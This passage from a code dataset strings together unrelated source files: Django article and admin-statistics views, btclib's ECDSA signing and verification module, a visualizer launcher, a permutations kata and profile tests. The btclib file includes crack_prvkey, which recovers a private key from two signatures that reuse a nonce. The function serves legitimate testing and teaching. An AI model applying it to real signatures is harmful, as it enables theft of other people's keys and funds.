print(get_interactions(interactions2, 'Q14790'))\n\n\ndef average_interactions(interactions):\n    protein_appearance = {}  # a dictionary structured as {protein: occurrences}\n    total_occurances = 0  # counts ALL protein occurrences\n    for tuple_proteins in interactions:  # iterate through data\n        for protein in tuple_proteins:  # iterate through proteins in the tuples\n            if protein in protein_appearance.keys():  # check whether the protein is in dictionary\n                continue  # next protein\n            else:\n                # print(protein)\n                total_occurances = total_occurances + len(\n                    get_interactions(interactions, protein))  # total up all the occurrences\n                protein_appearance[protein] = len(get_interactions(interactions, protein))  #\n    for k, v in protein_appearance.items():\n        pass\n        # print(\" { \", k, \" \" , v ,\"} \" )\n    # print(\"total occurance \", total_occurances, \" uniq_ids = \" ,len(protein_appearance.keys()) )\n    # print(total_occurances/len(protein_appearance.keys()))\n    return total_occurances / len(protein_appearance.keys())\n\n\naverage_interactions(interactions2)","sub_path":"program-2-python/naive-bayes/naiive-bayes.py","file_name":"naiive-bayes.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"522246946","text":"# Create your views here.\nfrom django.http import HttpResponse\nfrom article.models import Article,Comment\nfrom django.template.loader import get_template #for templates\nfrom django.template import Context #for templates\nfrom django.views.generic.base import TemplateView #for class based view\nfrom django.shortcuts import render_to_response\nfrom forms import ArticleForm, CommentForm #importing ArticleForm from forms.py\nfrom django.http import HttpResponseRedirect\nfrom django.core.context_processors import csrf\nfrom django.utils import timezone #for knowing time on server\n\n#example lecture4\n#def hello(request):\n#    name=\"rajat\"\n#    html=\"Hi %s u r on right path!!\" %name\n#    return HttpResponse(html)\n    \n#def hello_template(request):\n#    name=\"rajat\"\n#    t=get_template('hello.html')\n#    html=t.render(Context({'name':name}))\n#    return HttpResponse(html)\n    \n#def hello_simple(request):\n#    name=\"rajat\"\n#    return render_to_response('hello.html',{'name':name}) #this function does the same thing as the one above, but more simply\n\n#class HelloTemplate(TemplateView):\n#    template_name='hello_class.html'\n    \n#    def get_context_data(self, **kwargs):\n#        context=super(HelloTemplate, self).get_context_data(**kwargs)\n#        context['name']='rajat'\n#        context['frame']='django'\n#        return context\n\ndef articles(request):\n    language='en-gb' #for cookies\n    session_language='en-gb' #for session\n    if 'lang' in request.COOKIES:\n        language=request.COOKIES['lang'] #if language is available in cookies use that to set language and dont use default set above\n    if 'lang' in request.session:\n        session_language=request.session['lang']\n    args={}\n    args.update(csrf(request))\n    args['articles']=Article.objects.all()\n    args['language']=language\n    args['session_language']=session_language\n    return render_to_response('articles.html',args) #getting all objects of Article consider it as table\n    \ndef article(request, article_id=1):\n    return render_to_response('article.html',{'article':Article.objects.get(id=article_id)})\n    \ndef language(request, language='en-gb'):\n    response=HttpResponse(\"language set to %s consider going back to page now\" % language)\n    response.set_cookie('lang',language) #using set_cookie method of response object to set 
language\n    request.session['lang']=language #sessions are stored on the request object\n    return response\n    \ndef create(request):\n    if request.POST:\n        form=ArticleForm(request.POST, request.FILES) #if post got any info, request.files will get if there is any file uploaded\n        if form.is_valid():\n            form.save()\n            return HttpResponseRedirect('/articles/all')\n    else:\n        form=ArticleForm() #blank form\n    args={}\n    args.update(csrf(request)) #building form securely\n    args['form']=form #pop the form to be rendered in template\n    return render_to_response('create_article.html', args)\n    \ndef like_article(request, article_id):\n    if article_id:\n        a=Article.objects.get(id=article_id) #fetching the required article\n        a.likes += 1\n        a.save() #update number of likes for that article\n        return HttpResponseRedirect('/articles/get/%s' % article_id) #redirecting it to same article of which like is clicked to show new num of likes\n        #TODO: consider allowing a given login id to like only once\n\n    \ndef add_comment(request, article_id):\n    a=Article.objects.get(id=article_id) #loading the article so that comment could be saved on correct article\n    if request.method=='POST':\n        f=CommentForm(request.POST) #create commentform using POST\n        if f.is_valid():\n            c=f.save(commit=False) #save form but dont push it to database,this returns instance of comment in c\n            c.pub_date=timezone.now() #setting pub_date for comment using current time of server\n            c.article=a #setting article field for comment to which comment is linked to\n            c.save()\n        return HttpResponseRedirect('/articles/get/%s' % article_id)    \n    else:\n        f=CommentForm() #displaying blank form\n    args={}\n    args.update(csrf(request)) #building form securely\n    args['article']=a\n    args['form']=f\n    return render_to_response('add_comment.html', args)\n    \ndef search_titles(request):\n    if request.method=='POST':\n        search_text=request.POST['search_text'] #search_text in POST dictionary and pass it to variable search_text\n    else:\n        search_text=''\n    articles=Article.objects.filter(title__contains=search_text) #filter title where it contains search text in title\n    return render_to_response('ajax_search.html', {'articles':articles})\n    \n    \n    \n    \n    ","sub_path":"article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"156626669","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAdminUser\n\nfrom datetime import date, timedelta\n\nfrom meiduo_admin.serializers.increment import GoodsVisitCountSerializer\nfrom users.models import User\nfrom goods.models import GoodsVisitCount\n\n\nclass IncrementTotalcountView(APIView):\n    \"\"\"\n    Total number of registered users\n    \"\"\"\n    # specify permissions\n    permission_classes = [IsAdminUser]\n\n    def get(self, request):\n        # 1. Query the total number of registered users\n        count = User.objects.all().count()\n\n        # 2. Get the current date\n        now_date = date.today()\n\n        # 3. Return the result\n        return Response({\n            'count': count,\n            'date': now_date\n        })\n\n\nclass IncrementDayCountView(APIView):\n    \"\"\"\n    Number of users who registered today\n    \"\"\"\n    # specify permissions\n    permission_classes = [IsAdminUser]\n\n    def get(self, request):\n        # 1. Get the current date\n        now_date = date.today()\n        # 2. Query the number of users who registered today\n        count = User.objects.filter(date_joined__gte=now_date).count()\n        # 3. Return the result\n        return Response({\n            'count': count,\n            'date': now_date\n        })\n\n\nclass IncrementDayActiveView(APIView):\n    \"\"\"\n    Number of users who logged in today\n    \"\"\"\n    # specify permissions\n    permission_classes = [IsAdminUser]\n\n    def get(self, request):\n        # 1. Get the current date\n        now_date = 
date.today()\n        # 2. Query the number of users who logged in today\n        count = User.objects.filter(last_login__gte=now_date).count()\n        # 3. Return the result\n        return Response({\n            'count': count,\n            'date': now_date\n        })\n\n\nclass IncrementDayOrderView(APIView):\n    \"\"\"\n    Number of users who placed orders today\n    \"\"\"\n    # specify permissions\n    permission_classes = [IsAdminUser]\n\n    def get(self, request):\n        # 1. Get the current date\n        now_date = date.today()\n        # 2. Query the number of users who placed orders today\n        count = User.objects.filter(orders__create_time__gte=now_date).count()\n        # 3. Return the result\n        return Response({\n            'count': count,\n            'date': now_date\n        })\n\n\nclass IncrementMonthCountView(APIView):\n    \"\"\"\n    Daily counts of registered users over the past month\n    \"\"\"\n    # specify permissions\n    permission_classes = [IsAdminUser]\n\n    def get(self, request):\n        # 1. Get the current date\n        now_date = date.today()\n        # 2. Get the date one month ago\n        start_date = now_date - timedelta(days=29)\n\n        # build the list of data points\n        data_list = []\n        for i in range(30):\n            # get the date for this iteration\n            index_date = start_date + timedelta(days=i)\n            # get the following day\n            next_date = index_date + timedelta(days=1)\n            count = User.objects.filter(date_joined__gte=index_date, date_joined__lt=next_date).count()\n            data_list.append({'count': count, 'date': index_date})\n        # 3. Return the result\n        return Response(data_list)\n\n\nclass GoodsVisitCountView(APIView):\n    \"\"\"\n    Per-category goods visit counts for today\n    \"\"\"\n    # specify permissions\n    permission_classes = [IsAdminUser]\n\n    def get(self, request):\n        # 1. Get the current date\n        now_date = date.today()\n        # 2. Query today's goods visit records\n        goodvisit = GoodsVisitCount.objects.filter(date__gte=now_date)\n        # 3. Return the result\n        ser = GoodsVisitCountSerializer(goodvisit, many=True)\n        return Response(ser.data)\n","sub_path":"meiduo_mall/apps/meiduo_admin/views/increments.py","file_name":"increments.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"446221367","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2020 The btclib developers\n#\n# This file is part of btclib. It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\n\"\"\"Elliptic Curve Digital Signature Algorithm (ECDSA).\n\n    Implementation according to SEC 1 v.2:\n\n    http://www.secg.org/sec1-v2.pdf\n\n    specialized with bitcoin canonical 'low-s' encoding.\n\"\"\"\n\nimport secrets\nfrom hashlib import sha256\nfrom typing import List, Optional, Tuple\n\nfrom . 
import der\nfrom .alias import DSASig, DSASigTuple, HashF, JacPoint, Octets, Point, String\nfrom .curve import Curve, secp256k1\nfrom .curvegroup import _double_mult, _mult\nfrom .exceptions import BTClibRuntimeError, BTClibValueError\nfrom .hashes import reduce_to_hlen\nfrom .numbertheory import mod_inv\nfrom .rfc6979 import __rfc6979\nfrom .to_prvkey import PrvKey, int_from_prvkey\nfrom .to_pubkey import Key, point_from_key\nfrom .utils import bytes_from_octets, int_from_bits\n\n# _validate_sig, deserialize and serialize are basically just wrappers\n# for the equivalent functions in the der module\n\n\ndef _validate_sig(r: int, s: int, ec: Curve = secp256k1) -> None:\n return der._validate_sig(r, s, None, ec)\n\n\ndef deserialize(sig: DSASig, ec: Curve = secp256k1) -> DSASigTuple:\n \"\"\"Return the verified components of the provided ECDSA signature.\n\n The ECDSA signature can be represented as (r, s) tuple or\n as strict ASN.1 DER binary representation.\n \"\"\"\n\n if not isinstance(sig, tuple):\n return der.deserialize(sig, ec)[0:2]\n\n r, s = sig\n _validate_sig(*sig, ec)\n return r, s\n\n\ndef serialize(r: int, s: int, ec: Curve = secp256k1) -> bytes:\n \"Return the ECDSA signature as strict ASN.1 DER representation.\"\n\n return der.serialize(r, s, None, ec)\n\n\ndef gen_keys(prvkey: PrvKey = None, ec: Curve = secp256k1) -> Tuple[int, Point]:\n \"Return a private/public (int, Point) key-pair.\"\n\n if prvkey is None:\n # q in the range [1, ec.n-1]\n q = 1 + secrets.randbelow(ec.n - 1)\n else:\n q = int_from_prvkey(prvkey, ec)\n\n QJ = _mult(q, ec.GJ, ec)\n Q = ec._aff_from_jac(QJ)\n # q.to_bytes(ec.nsize, 'big')\n # bytes_from_point(Q, ec, compressed)\n return q, Q\n\n\ndef _challenge(m: Octets, ec: Curve = secp256k1, hf: HashF = sha256) -> int:\n\n # The message m: a hlen array\n hlen = hf().digest_size\n m = bytes_from_octets(m, hlen)\n\n # leftmost ec.nlen bits %= ec.n\n c = int_from_bits(m, ec.nlen) % ec.n # 5\n return c\n\n\ndef challenge(msg: String, ec: Curve = secp256k1, hf: HashF = sha256) -> int:\n\n m = reduce_to_hlen(msg, hf)\n return _challenge(m, ec, hf)\n\n\ndef __sign(c: int, q: int, k: int, low_s: bool, ec: Curve) -> DSASigTuple:\n # Private function for testing purposes: it allows to explore all\n # possible value of the challenge c (for low-cardinality curves).\n # It assume that c is in [0, n-1], while q and k are in [1, n-1]\n\n # Steps numbering follows SEC 1 v.2 section 4.1.3\n\n KJ = _mult(k, ec.GJ, ec) # 1\n\n # affine x_K-coordinate of K (field element)\n x_K = (KJ[0] * mod_inv(KJ[2] * KJ[2], ec.p)) % ec.p\n # mod n makes it a scalar\n r = x_K % ec.n # 2, 3\n if r == 0: # r≠0 required as it multiplies the public key\n raise BTClibRuntimeError(\"failed to sign: r = 0\")\n\n s = mod_inv(k, ec.n) * (c + r * q) % ec.n # 6\n if s == 0: # s≠0 required as verify will need the inverse of s\n raise BTClibRuntimeError(\"failed to sign: s = 0\")\n\n # bitcoin canonical 'low-s' encoding for ECDSA signatures\n # it removes signature malleability as cause of transaction malleability\n # see https://github.com/bitcoin/bitcoin/pull/6769\n # TODO optional low_s\n if low_s and s > ec.n / 2:\n s = ec.n - s # s = - s % ec.n\n\n return r, s\n\n\ndef _sign(\n m: Octets,\n prvkey: PrvKey,\n k: Optional[PrvKey] = None,\n low_s: bool = True,\n ec: Curve = secp256k1,\n hf: HashF = sha256,\n) -> DSASigTuple:\n \"\"\"Sign a hlen bytes message according to ECDSA signature algorithm.\n\n If the deterministic nonce is not provided,\n the RFC6979 specification is used.\n \"\"\"\n\n # 
the message m: a hlen array\n hlen = hf().digest_size\n m = bytes_from_octets(m, hlen)\n\n # the secret key q: an integer in the range 1..n-1.\n # SEC 1 v.2 section 3.2.1\n q = int_from_prvkey(prvkey, ec)\n\n # the challenge\n c = _challenge(m, ec, hf) # 4, 5\n\n # the nonce k: an integer in the range 1..n-1.\n if k is None:\n k = __rfc6979(c, q, ec, hf) # 1\n else:\n k = int_from_prvkey(k, ec)\n\n # second part delegated to helper function\n return __sign(c, q, k, low_s, ec)\n\n\ndef sign(\n msg: String,\n prvkey: PrvKey,\n low_s: bool = True,\n ec: Curve = secp256k1,\n hf: HashF = sha256,\n) -> DSASigTuple:\n \"\"\"ECDSA signature with canonical low-s preference.\n\n Implemented according to SEC 1 v.2\n The message msg is first processed by hf, yielding the value\n\n m = hf(msg),\n\n a sequence of bits of length *hlen*.\n\n Normally, hf is chosen such that its output length *hlen* is\n roughly equal to *nlen*, the bit-length of the group order *n*,\n since the overall security of the signature scheme will depend on\n the smallest of *hlen* and *nlen*; however, the ECDSA standard\n supports all combinations of *hlen* and *nlen*.\n\n RFC6979 is used for deterministic nonce.\n\n See https://tools.ietf.org/html/rfc6979#section-3.2\n \"\"\"\n\n m = reduce_to_hlen(msg, hf)\n return _sign(m, prvkey, None, low_s, ec, hf)\n\n\ndef __assert_as_valid(c: int, QJ: JacPoint, r: int, s: int, ec: Curve) -> None:\n # Private function for test/dev purposes\n\n w = mod_inv(s, ec.n)\n u = c * w % ec.n\n v = r * w % ec.n # 4\n # Let K = u*G + v*Q.\n KJ = _double_mult(v, QJ, u, ec.GJ, ec) # 5\n\n # Fail if infinite(K).\n # edge case that cannot be reproduced in the test suite\n assert KJ[2] != 0, \"invalid (INF) key\" # 5\n\n # affine x_K-coordinate of K\n x_K = (KJ[0] * mod_inv(KJ[2] * KJ[2], ec.p)) % ec.p\n # Fail if r ≠ x_K %n.\n if r != x_K % ec.n: # 6, 7, 8\n raise BTClibRuntimeError(\"signature verification failed\")\n\n\ndef _assert_as_valid(\n m: Octets, key: Key, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> None:\n # Private function for test/dev purposes\n # It raises Errors, while verify should always return True or False\n\n r, s = deserialize(sig, ec) # 1\n\n # The message m: a hlen array\n m = bytes_from_octets(m, hf().digest_size)\n c = _challenge(m, ec, hf) # 2, 3\n\n Q = point_from_key(key, ec)\n QJ = Q[0], Q[1], 1\n\n # second part delegated to helper function\n __assert_as_valid(c, QJ, r, s, ec)\n\n\ndef assert_as_valid(\n msg: String, key: Key, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> None:\n # Private function for test/dev purposes\n # It raises Errors, while verify should always return True or False\n\n m = reduce_to_hlen(msg, hf)\n _assert_as_valid(m, key, sig, ec, hf)\n\n\ndef _verify(\n m: Octets, key: Key, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> bool:\n \"\"\"ECDSA signature verification (SEC 1 v.2 section 4.1.4).\"\"\"\n\n # all kind of Exceptions are catched because\n # verify must always return a bool\n try:\n _assert_as_valid(m, key, sig, ec, hf)\n except Exception: # pylint: disable=broad-except\n return False\n else:\n return True\n\n\ndef verify(\n msg: String, key: Key, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> bool:\n \"\"\"ECDSA signature verification (SEC 1 v.2 section 4.1.4).\"\"\"\n\n m = reduce_to_hlen(msg, hf)\n return _verify(m, key, sig, ec, hf)\n\n\ndef recover_pubkeys(\n msg: String, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> List[Point]:\n \"\"\"ECDSA public key recovery 
(SEC 1 v.2 section 4.1.6).\n\n See also:\n https://crypto.stackexchange.com/questions/18105/how-does-recovering-the-public-key-from-an-ecdsa-signature-work/18106#18106\n \"\"\"\n\n m = reduce_to_hlen(msg, hf)\n return _recover_pubkeys(m, sig, ec, hf)\n\n\ndef _recover_pubkeys(\n m: Octets, sig: DSASig, ec: Curve = secp256k1, hf: HashF = sha256\n) -> List[Point]:\n \"\"\"ECDSA public key recovery (SEC 1 v.2 section 4.1.6).\n\n See also:\n https://crypto.stackexchange.com/questions/18105/how-does-recovering-the-public-key-from-an-ecdsa-signature-work/18106#18106\n \"\"\"\n\n # The message m: a hlen array\n hlen = hf().digest_size\n m = bytes_from_octets(m, hlen)\n\n c = _challenge(m, ec, hf) # 1.5\n\n r, s = deserialize(sig, ec)\n\n QJs = __recover_pubkeys(c, r, s, ec)\n return [ec._aff_from_jac(QJ) for QJ in QJs]\n\n\n# TODO: use __recover_pubkey to avoid code duplication\ndef __recover_pubkeys(c: int, r: int, s: int, ec: Curve) -> List[JacPoint]:\n # Private function provided for testing purposes only.\n\n # precomputations\n r_1 = mod_inv(r, ec.n)\n r1s = r_1 * s % ec.n\n r1e = -r_1 * c % ec.n\n keys: List[JacPoint] = []\n # r = K[0] % ec.n\n # if ec.n < K[0] < ec.p (likely when cofactor ec.cofactor > 1)\n # then both x_K=r and x_K=r+ec.n must be tested\n for j in range(ec.cofactor + 1): # 1\n # affine x_K-coordinate of K (field element)\n x_K = (r + j * ec.n) % ec.p # 1.1\n # two possible y_K-coordinates, i.e. two possible keys for each cycle\n try:\n # even root first for bitcoin message signing compatibility\n yodd = ec.y_even(x_K)\n KJ = x_K, yodd, 1 # 1.2, 1.3, and 1.4\n # 1.5 has been performed in the recover_pubkeys calling function\n QJ = _double_mult(r1s, KJ, r1e, ec.GJ, ec) # 1.6.1\n try:\n __assert_as_valid(c, QJ, r, s, ec) # 1.6.2\n except (BTClibValueError, BTClibRuntimeError):\n pass\n else:\n keys.append(QJ) # 1.6.2\n KJ = x_K, ec.p - yodd, 1 # 1.6.3\n QJ = _double_mult(r1s, KJ, r1e, ec.GJ, ec)\n try:\n __assert_as_valid(c, QJ, r, s, ec) # 1.6.2\n except (BTClibValueError, BTClibRuntimeError):\n pass\n else:\n keys.append(QJ) # 1.6.2\n except (BTClibValueError, BTClibRuntimeError): # K is not a curve point\n pass\n return keys\n\n\ndef __recover_pubkey(key_id: int, c: int, r: int, s: int, ec: Curve) -> JacPoint:\n # Private function provided for testing purposes only.\n\n # precomputations\n r_1 = mod_inv(r, ec.n)\n r1s = r_1 * s % ec.n\n r1e = -r_1 * c % ec.n\n # r = K[0] % ec.n\n # if ec.n < K[0] < ec.p (likely when cofactor ec.cofactor > 1)\n # then both x_K=r and x_K=r+ec.n must be tested\n j = key_id & 0b110 # allow for key_id in [0, 7]\n x_K = (r + j * ec.n) % ec.p # 1.1\n\n # even root first for Bitcoin Core compatibility\n i = key_id & 0b01\n y_even = ec.y_even(x_K)\n y_K = ec.p - y_even if i else y_even\n KJ = x_K, y_K, 1 # 1.2, 1.3, and 1.4\n # 1.5 has been performed in the recover_pubkeys calling function\n QJ = _double_mult(r1s, KJ, r1e, ec.GJ, ec) # 1.6.1\n __assert_as_valid(c, QJ, r, s, ec) # 1.6.2\n return QJ\n\n\ndef _crack_prvkey(\n m_1: Octets,\n sig1: DSASig,\n m_2: Octets,\n sig2: DSASig,\n ec: Curve = secp256k1,\n hf: HashF = sha256,\n) -> Tuple[int, int]:\n\n r_1, s_1 = deserialize(sig1, ec)\n r_2, s_2 = deserialize(sig2, ec)\n if r_1 != r_2:\n raise BTClibValueError(\"not the same r in signatures\")\n if s_1 == s_2:\n raise BTClibValueError(\"identical signatures\")\n\n # The message m: a hlen array\n hlen = hf().digest_size\n m_1 = bytes_from_octets(m_1, hlen)\n m_2 = bytes_from_octets(m_2, hlen)\n\n c_1 = _challenge(m_1, ec, hf)\n c_2 = 
_challenge(m_2, ec, hf)\n k = (c_1 - c_2) * mod_inv(s_1 - s_2, ec.n) % ec.n\n q = (s_2 * k - c_2) * mod_inv(r_1, ec.n) % ec.n\n return q, k\n\n\ndef crack_prvkey(\n msg1: String,\n sig1: DSASig,\n msg2: String,\n sig2: DSASig,\n ec: Curve = secp256k1,\n hf: HashF = sha256,\n) -> Tuple[int, int]:\n\n m_1 = reduce_to_hlen(msg1, hf)\n m_2 = reduce_to_hlen(msg2, hf)\n\n return _crack_prvkey(m_1, sig1, m_2, sig2, ec, hf)\n","sub_path":"btclib/dsa.py","file_name":"dsa.py","file_ext":"py","file_size_in_byte":12333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"315772916","text":"#!/usr/bin/env python3\n\nimport os, sys\nfrom graphics import Visualizer\nfrom graphics.variables import Split\n\nADDRESS = \"localhost\"\nPORT = os.environ.get(\"SERVER_PORT\", 11297)\n\nclass Visualize:\n def __init__(self, run_on_clock=True):\n walls = ('-w' in sys.argv or os.environ.get(\"WALLS\",False))\n walls = True\n pacman = ('-p' in sys.argv or os.environ.get(\"PACMAN\",False))\n pacman = True\n top = ('-t' in sys.argv or os.environ.get(\"TOP\",False))\n # top = True\n bottom = ('-b' in sys.argv or os.environ.get(\"BOTTOM\",False))\n # bottom = True\n split = Split.FULL\n if top:\n split = Split.TOP\n elif bottom:\n split = Split.BOTTOM\n self.visualizer = Visualizer(ADDRESS, PORT, walls, pacman, split, run_on_clock=run_on_clock)\n self.visualizer.run()\n\n# if __name__ == \"__main__\":\n# main()\n","sub_path":"2021-2022/fasterPacman/gameEngine/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"431814862","text":"#\nimport collections\nimport copy\nimport tables\nimport os\nimport ShareYourSystem as SYS\nimport sys\n#\n\n#\nBasingLocalTypeString=\"Merger\"\nBaseClass=getattr(SYS,SYS.getClassStringWithTypeString(BasingLocalTypeString))\n#\n\n#\nclass FeaturerClass(\n\t\t\t\t\tBaseClass\n\t\t\t\t):\n\t\n\t@Hooker.HookerClass(**{'HookingAfterVariablesList':[{'CallingVariable':BaseClass.__init__}]})\n\tdef init(self,**_KwargVariablesDict):\n\n\t\t#\n\t\tself.FeaturingAllBool=False\t\t\t\t\t\t\t\t\t\t#\n\t\t#\n\n\t@SYS.HookerClass(**{'HookingBeforeTuplesList':[(\"Rower\",\"model\")]})\n\tdef model(self,**_KwargVariablesDict):\n\n\t\t#Put all the GettingStringsList in the identifying container\n\t\tif self.FeaturingAllBool:\n\t\t\tself.RowedIdentifiedGettingStringsList=SYS.unzip(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.ModelingColumnTuplesList,[0]\n\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\tself.RowedNotIdentifiedGettingStringsList=[]\t\n\n#\n\n#\ndef attest_flush():\n\tFeaturer=SYS.FeaturerClass().update(\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\t('MyInt',0),\n\t\t\t\t\t\t\t\t\t\t('MyString',\"hello\"),\n\t\t\t\t\t\t\t\t\t\t('MyIntsList',[2,4,1]),\n\t\t\t\t\t\t\t\t\t\t('ModelingColumnTuplesList',\n\t\t\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\t\t\t('MyInt',tables.Int64Col()),\n\t\t\t\t\t\t\t\t\t\t\t\t('MyString',tables.StringCol(10)),\n\t\t\t\t\t\t\t\t\t\t\t\t('MyIntsList',(tables.Int64Col(shape=3)))\n\t\t\t\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t\t('FeaturingAllBool',True)\n\t\t\t\t\t\t\t\t\t]).flush(\n\t\t\t\t\t\t\t\t\t).update(\n\t\t\t\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\t\t\t\t('MyInt',1),\n\t\t\t\t\t\t\t\t\t\t\t('MyString',\"bonjour\"),\n\t\t\t\t\t\t\t\t\t\t\t('MyIntsList',[2,4,6])\n\t\t\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t\t\t).flush(\n\t\t\t\t\t\t\t\t\t).hdfclose()\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t#Get 
the h5ls version of the stored hdf\n\treturn SYS.represent(\n\t\t\t\t\t\tFeaturer\n\t\t\t\t\t\t)+'\\n\\n\\n\\n'+Featurer.hdfview().HdformatedString\t\n#\n","sub_path":"Install/ShareYourSystem/Object/Featurer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"302411616","text":"# In this kata you have to create all permutations of an input string and remove duplicates, if present.\n# This means, you have to shuffle all letters from the input in all possible orders.\n\n# Examples:\n\n# permutations('a'); # ['a']\n# permutations('ab'); # ['ab', 'ba']\n# permutations('aabb'); # ['aabb', 'abab', 'abba', 'baab', 'baba', 'bbaa']\n\n# The order of the permutations doesn't matter.\n\ndef permutations(string):\n out = set([string])\n if len(string) == 2:\n out.add(string[1]+string[0])\n elif len(string) > 2:\n for k, m in enumerate(string):\n for i in permutations(string[:k] + string[k+1:]):\n out.add(m+i)\n return list(out)\n","sub_path":"4_kyu/Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"32642348","text":"import random\nfrom django.test import TestCase, override_settings\n\nfrom eahub.base.models import User\nfrom eahub.localgroups.models import LocalGroup, Organisership\nfrom eahub.profiles.models import CauseArea, Profile, ProfileAnalyticsLog\n\n\n@override_settings(IS_ENABLE_ALGOLA=False)\nclass ProfileTestCase(TestCase):\n def test_get_is_organiser(self):\n profile = create_profile(\"test@email.com\", \"User1\")\n\n local_group = LocalGroup()\n local_group.save()\n\n o = Organisership(user=profile.user, local_group=local_group)\n o.save()\n\n self.assertTrue(profile.get_is_organiser())\n\n def test_get_exportable_field_names(self):\n actual = Profile.get_exportable_field_names()\n\n expected_field_names = [\n \"id\",\n \"user\",\n \"slug\",\n \"is_public\",\n \"is_approved\",\n \"name\",\n \"image\",\n \"city_or_town\",\n \"country\",\n \"linkedin_url\",\n \"facebook_url\",\n \"personal_website_url\",\n \"lat\",\n \"lon\",\n \"cause_areas\",\n \"available_to_volunteer\",\n \"open_to_job_offers\",\n \"expertise_areas\",\n \"career_interest_areas\",\n \"available_as_speaker\",\n \"email_visible\",\n \"topics_i_speak_about\",\n \"organisational_affiliations\",\n \"summary\",\n \"giving_pledges\",\n \"legacy_record\",\n \"offering\",\n \"looking_for\",\n \"local_groups\",\n ]\n\n self.assertListEqual(expected_field_names, actual)\n\n def test_save_analytics_on_profile_creation(self):\n profile = create_profile(\"test@email.com\", \"User1\")\n\n analytics_logs = ProfileAnalyticsLog.objects.filter(profile=profile)\n\n analytics_logs_name = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"name\"\n )\n analytics_logs_is_approved = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"is_approved\"\n )\n analytics_logs_is_public = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"is_public\"\n )\n analytics_logs_slug = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"slug\"\n )\n analytics_logs_id = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"id\"\n )\n analytics_logs_user_id = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"user\"\n )\n analytics_logs_email_visible = ProfileAnalyticsLog.objects.filter(\n profile=profile, 
field=\"email_visible\"\n )\n\n self.assertEqual(\"User1\", analytics_logs_name.first().new_value)\n self.assertEqual(\"False\", analytics_logs_is_approved.first().new_value)\n self.assertEqual(\"True\", analytics_logs_is_public.first().new_value)\n self.assertEqual(\"user1\", analytics_logs_slug.first().new_value)\n self.assertEqual(str(profile.id), analytics_logs_id.first().new_value)\n self.assertEqual(str(profile.user), analytics_logs_user_id.first().new_value)\n self.assertEqual(\"False\", analytics_logs_email_visible.first().new_value)\n self.assertEqual(8, len(analytics_logs))\n self.assertTrue(all(x.action == \"Create\" for x in analytics_logs))\n self.assertTrue(\n all(\n x.action_uuid == analytics_logs.first().action_uuid\n for x in analytics_logs\n )\n )\n self.assertTrue(\n all(x.time == analytics_logs.first().time for x in analytics_logs)\n )\n\n def test_save_analytics_on_change(self):\n profile = create_profile(\"test@email.com\", \"User1\")\n\n profile.name = \"User1New\"\n profile.cause_areas = [CauseArea.BUILDING_EA_COMMUNITIES]\n profile.save()\n\n analytics_logs_name_updated = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"name\", action=\"Update\"\n )\n\n analytics_logs_cause_area_updated = ProfileAnalyticsLog.objects.filter(\n profile=profile, field=\"cause_areas\", action=\"Update\"\n )\n\n analytics_logs_update = ProfileAnalyticsLog.objects.filter(\n profile=profile, action=\"Update\"\n )\n\n self.assertEqual(\"User1New\", analytics_logs_name_updated.first().new_value)\n self.assertEqual(\n str([\"Building EA communities\"]),\n analytics_logs_cause_area_updated.first().new_value,\n )\n self.assertEqual(2, len(analytics_logs_update))\n self.assertTrue(\n all(\n x.action_uuid == analytics_logs_update.first().action_uuid\n for x in analytics_logs_update\n )\n )\n self.assertTrue(\n all(\n x.time == analytics_logs_update.first().time\n for x in analytics_logs_update\n )\n )\n\n def test_has_community_details_returns_false_if_none(self):\n profile = create_profile(\"test@email.com\", \"peter\")\n\n self.assertFalse(profile.has_community_details())\n\n def test_has_community_details_returns_true_if_free_text_field_set(self):\n profile = create_profile(\"test@email.com\", \"peter\")\n\n field_names = [\"topics_i_speak_about\", \"offering\", \"looking_for\"]\n setattr(profile, random.choice(field_names), \"something\")\n\n self.assertTrue(profile.has_community_details())\n\n\ndef create_profile(email, username):\n user = 